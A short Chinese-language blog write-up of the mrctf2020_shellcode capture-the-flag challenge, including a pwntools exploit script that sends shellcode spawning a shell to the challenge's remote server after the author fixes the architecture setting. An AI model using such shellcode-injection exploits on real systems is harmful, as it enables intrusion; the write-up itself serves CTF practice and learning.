能坑我,但没有完全坑我——mrctf2020_shellcode

ida不能f5,很烦,都不想做了

其实这个结构还行,虽然不能栈溢出,但是直接执行输入的命令

所以直接传一个asm(shellcraft.sh())就行了

然而这只是理论上可以

 疯狂报错

 

 后来发现是没有设置环境,shellcraft可能传了一个32位的shellcode上去

设置环境

 

 成功

 

 

exp:

from pwn import *
p=process('./pwn')
context(arch = 'amd64', os = 'linux', log_level = 'debug')
p=remote('node3.buuoj.cn',26687)
payload=asm(shellcraft.sh())
p.sendline(payload)
p.interactive()
~                                                                               
~                                                                               
~                                                                               
~                 

原来环境也有影响的吗,突然想到以前和网上打的一样然而通不过的情况,这波,这波是交学费,爷哭了

参考文章

https://blog.csdn.net/weixin_45556441/article/details/114166906

 

posted @ 2021-04-12 09:30  Haokunnnnnnnna  阅读(515)  评论(0编辑  收藏  举报